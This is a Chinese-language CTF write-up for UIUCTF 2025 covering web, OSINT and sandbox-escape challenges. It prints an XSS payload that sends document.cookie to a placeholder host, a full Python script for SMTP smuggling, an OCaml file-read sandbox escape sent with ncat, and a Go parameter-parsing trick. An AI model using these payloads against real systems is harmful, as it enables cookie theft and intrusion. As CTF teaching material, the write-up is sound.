UIUCTF 2025 wp
前言
第二天有事,没怎么写
Ruler of the Universe
${String(value).replace('"', """)}
这地方只转义第一个”,剩下的不会转义,用两个”即可闭合
"" autofocus onfocus="fetch('<https://xx/?'> + document.cookie)">park
查背后的绿色建筑,发现是Timmermansordens hus,然后谷歌地图找到公园是Tegnérlunden
cherry_blossom
正常搜索都会搜到樱花,但是认真看这个樱花会发现,樱花是假的
截取建筑物结构搜索,能看到布鲁塞尔 Autoworld 博物馆 2025 年通票 --- Entrada general al museo Autoworld de Bruselas 2025
这个网站里的博物馆有完全相同的建筑结构,樱花是一次展出的道具
具体位置是Parc du Cinquantenaire 11, 1000 Bruxelles, Belgium
Supermassive Black Hole
smtplib._fix_eols = return_unchanged
smtplib._quote_periods = return_unchanged
这里让邮件内容在发送前不经过任何自动修改,让邮件可能提前结束
邮件结束标识是\\r\\n.\\r\\n 代码里也有相应的检测
ending_count = message_data.count(b'\\r\\n.\\r\\n')
if ending_count != 1:
raise ValueError("Bad Request")
但是这里可以直接用\\n.\\r\\n来结束邮件
然后就是构造新邮件
格式类似于
MAIL FROM: [email protected]\\r\\n
RCPT TO: test\\r\\n
DATA\\r\\n
From: [email protected]\\r\\n
Subject: test\\r\\n
X-Ticket-ID: leader\\r\\n
这时候新的邮件的ID会是leader,用leader去查询即可
整理一下payload
import requests
import time
BASE_URL = "<https://inst-1bb31567b335735e-supermassive-black-hole.chal.uiuc.tf>"
def submit_ticket():
subject = "\\n.\\r\\nMAIL FROM: [email protected]\\r\\nRCPT TO: test\\r\\nDATA\\r\\nFrom: [email protected]\\r\\nSubject: test\\r\\nX-Ticket-ID: leader\\r\\n"
data = {
"subject": subject,
"message": "testmessage"
}
response = requests.post(
f"{BASE_URL}/submit_ticket",
data=data
)
print(response.text)
def check_response(ticket_id):
try:
response = requests.get(
f"{BASE_URL}/check_response/{ticket_id}",
timeout=10
)
return response.json()
except:
return None
def main():
submit_ticket()
time.sleep(5)
response_data = check_response("leader")
print(response_data)
if __name__ == "__main__":
main()
Error: (250, b'OK')
{'body': 'X-Ticket-ID: 3794d4cd-71e9-4a19-bcac-62f3b190affd\\r\\n\\r\\ntestmessage\\r\\n', 'from': '[email protected]', 'processed_by': 'it_bot', 'response': 'C-Suite ticket received! Will escalate immediately!\\nuiuctf{7h15_c0uld_h4v3_b33n_4_5l4ck_m355463_8091732490}', 'subject': 'test', 'timestamp': 1753517824464}
nocaml
只使用 OCaml 自带的、无需任何额外链接的底层 C 函数
(*获取系统函数*)
external sys_open : string -> 'a list -> int -> int = "caml_sys_open"
external open_descriptor_in : int -> in_channel = "caml_ml_open_descriptor_in"
external open_descriptor_out : int -> out_channel = "caml_ml_open_descriptor_out"
external ml_input : in_channel -> bytes -> int -> int -> int = "caml_ml_input"
external ml_output : out_channel -> bytes -> int -> int -> unit = "caml_ml_output"
external create_bytes : int -> bytes = "caml_create_bytes"
let () =
let in_fd = sys_open "/pwn/flag.txt" [] 0 in
let ic = open_descriptor_in in_fd in
let buf = create_bytes 100 in
let bytes_read = ml_input ic buf 0 100 in
let oc = open_descriptor_out 1 in
let () = ml_output oc buf 0 bytes_read in
()
(echo 'external sys_open : string -> '\\''a list -> int -> int = "caml_sys_open";; external open_descriptor_in : int -> in_channel = "caml_ml_open_descriptor_in";; external open_descriptor_out : int -> out_channel = "caml_ml_open_descriptor_out";; external ml_input : in_channel -> bytes -> int -> int -> int = "caml_ml_input";; external ml_output : out_channel -> bytes -> int -> int -> unit = "caml_ml_output";; external create_bytes : int -> bytes = "caml_create_bytes";; let () = let in_fd = sys_open "/pwn/flag.txt" [] 0 in let ic = open_descriptor_in in_fd in let buf = create_bytes 100 in let bytes_read = ml_input ic buf 0 100 in let oc = open_descriptor_out 1 in let () = ml_output oc buf 0 bytes_read in ();;' | base64 -w0; echo) | ncat --no-shutdown --ssl nocaml.chal.uiuc.tf 1337
Shipping Bay
这题刚写出来发现已经有人出了
那就放个参考文献吧
Unexpected security footguns in Go's parsers -The Trail of Bits Blog
主要在于解析器的差异,go语言解析器认为s和ſ相同而且出现相同的键后面的会覆盖前面的
所以只需要发送supply_type=others&ſupply_type=flag 即可获得flag
许可协议:
CC BY 4.0